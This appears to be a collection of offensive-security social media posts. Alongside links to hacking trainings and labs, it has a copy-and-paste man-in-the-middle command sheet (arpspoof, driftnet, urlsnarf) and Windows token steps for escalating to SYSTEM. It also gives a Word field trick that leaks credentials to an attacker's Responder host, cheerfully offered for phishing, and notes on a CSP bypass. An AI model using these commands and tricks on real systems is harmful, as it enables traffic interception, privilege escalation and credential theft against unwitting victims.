A huge list of:
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners…
MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the original.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles.
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
0xbadjuju/Tokenvator
A tool to elevate privilege with Windows Tokens. Contribute to 0xbadjuju/Tokenvator development by creating an account on GitHub.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Persistence: “the continued or prolonged existence of something”
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
www.mdsec.co.uk
Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office – MDSec
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that.
This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc
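The mismatch described in the CSP post above, as an added example that is not part of the original post: a simplified model of CSP path matching (the path is split on "/" before each segment is percent-decoded) next to a server that decodes first, with a check that flags paths the policy accepts but the server resolves elsewhere. The `/scripts/` policy directory, the sample paths and all function names are constructed for illustration.

```javascript
// Percent-decode, returning null instead of throwing on malformed escapes.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return null; }
}

// Simplified model of CSP Level 3 path-part matching: split both paths on
// "/", THEN percent-decode each segment. An encoded "%2f" therefore never
// creates a new segment on the browser side.
function cspPathMatches(policyPath, urlPath) {
  if (policyPath === "") return true;
  const exact = !policyPath.endsWith("/");
  const a = policyPath.split("/");
  const b = urlPath.split("/");
  if (a.length > b.length) return false;
  if (exact && a.length !== b.length) return false;
  if (!exact) a.pop(); // drop the empty piece after the trailing "/"
  return a.every((piece, i) => {
    const da = safeDecode(piece);
    return da !== null && da === safeDecode(b[i]);
  });
}

// Assumed server behaviour ("if server decodes it"): decode the whole path
// first, then resolve "." and ".." segments.
function serverResolvedPath(urlPath) {
  const decoded = safeDecode(urlPath);
  if (decoded === null) return null;
  const out = [];
  for (const seg of decoded.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop(); else out.push(seg);
  }
  return "/" + out.join("/");
}

// True when the policy check passes but the resource the server would serve
// lies outside policyDir (which must end in "/"). Malformed escapes are
// flagged as well, since the two sides cannot be compared.
function escapesPolicyDir(policyDir, urlPath) {
  if (!cspPathMatches(policyDir, urlPath)) return false;
  const resolved = serverResolvedPath(urlPath);
  return resolved === null || !(resolved + "/").startsWith(policyDir);
}

// Constructed sample paths, checked against a policy of "/scripts/".
for (const p of ["/scripts/app.js", "/scripts/%2f..%2fuploads/user.js", "/uploads/user.js"]) {
  console.log(p, cspPathMatches("/scripts/", p), escapesPolicyDir("/scripts/", p));
}
```

A server that rejects `%2f` in request paths, or leaves it undecoded, resolves the same directory the policy check saw.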